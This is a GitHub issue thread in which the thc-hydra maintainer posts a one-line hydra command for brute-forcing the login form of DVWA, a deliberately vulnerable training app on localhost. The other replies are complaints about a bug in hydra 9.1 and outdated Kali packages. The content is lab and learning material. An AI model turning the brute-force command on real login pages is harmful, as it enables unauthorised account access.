SOLUTION: How to solve DVWA /vulnerabilities/brute/

[vanhauser-thc]

As many people are not able to solve this easily - this is how to do it:

1. Log into DVWA (login: admin, password: password)
2. Collect your PHPSESSID cookie (e.g. look in your browser's cookie jar, use zaproxy, right mouseclick "inspect accessible properties" in firefox, etc.)
3. hydra -l admin -p password 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=61p8up0thkqjft9vn5osv6afk2; security=low:F=Username and/or password incorrect'
4. profit

you can replace -p password with with -P and a file containing passwords, e.g. -P passwords.txt

Note: you need hydra 9.0 - or better 9,2+. hydra 9.1 has a bug in the module and does not work.
If your Linux distribution comes with an old version, contact the package maintainer or compile hydra yourself.

[sochartgit]

Unable to make v9.1 working properly on DVWA 1.9 or 1.10.
No connection logged on the web server side.

[vanhauser-thc]

@sochartgit why dont you use hydra 9.2 then?

[sochartgit]

What a poo solution, seriously. I have wasted 6h, with 5 computer science students trying to figure you why it was not working, experienced the same trouble on kali, latest version, on docker, on windows. No mention anywhere on your site about the fact version 9.1 had troubles. And you ask me why I don't use version 9.2. Seriously ?

…

________________________________ De : van Hauser ***@***.***> Envoyé : 6 mai 2021 18:48 À : vanhauser-thc/thc-hydra ***@***.***> Cc : sochartgit ***@***.***>; Mention ***@***.***> Objet : Re: [vanhauser-thc/thc-hydra] SOLUTION: How to solve DVWA /vulnerabilities/brute/ (#612) @sochartgit<https://github.com/sochartgit> why dont you use hydra 9.2 then? — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub<#612 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AT2UUS6DTH7XKH4QQE5UNBTTMMMCDANCNFSM4ZAG6UTQ>.

[vanhauser-thc]

@sochartgit
There is an entry in the Changelog that says that there is a fix in the http-post module.
Please complain to the package maintainer of the distro you are using that they are shipping an old version, that is not my job.
The bug only affected 9.1.
Next time you have problems with a software I highly recommend to check if there is a new version available.

[sochartgit]

Naaaa, problem was with http-GET and http-GET-form, no mention anwhere.

…

________________________________ De : van Hauser ***@***.***> Envoyé : 7 mai 2021 02:48 À : vanhauser-thc/thc-hydra ***@***.***> Cc : sochartgit ***@***.***>; Mention ***@***.***> Objet : Re: [vanhauser-thc/thc-hydra] SOLUTION: How to solve DVWA /vulnerabilities/brute/ (#612) @sochartgit<https://github.com/sochartgit> There is an entry in the Changelog that says that there is a fix in the http-post module. Please complain to the package maintainer of the distro you are using that they are shipping an old version, that is not my job. The bug only affected 9.1. Next time you have problems with a software I highly recommend to check if there is a new version available. — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub<#612 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AT2UUSZMLAZ62FQKZH7PA3TTMOENDANCNFSM4ZAG6UTQ>.

[vanhauser-thc]

that is not only documented but also shown in the proposed solution ...

[JohnSt99]

Any idea why the package is not updated to 9.2 when using apt install hydra? it says the latest version 9.1 is installed

[vanhauser-thc]

@JohnSt99 that is up to the package maintainer. just check out who is the package maintainer at the distribution you are using.
but you could just compile it yourself? that is what I do with most of the important software I am using.

[JohnSt99]

I ended up compiling it myself, but I found it weird that apt in Kali downloads 9.1 almost 2 months after the release. Will keep in mind from now on to check latest versions myself! Maybe you could add that other modules also got fixed in 9.2 because I was about to ignore the latest version until I randomly stumbled on this thread

[kastahl]

Come across the same situation and wasting 8h+ of time.

Unfortunately Kali repo still doesn't updated hydra package to the present day 👎
So I also ended up compilling it myself - And hey now it works ;-)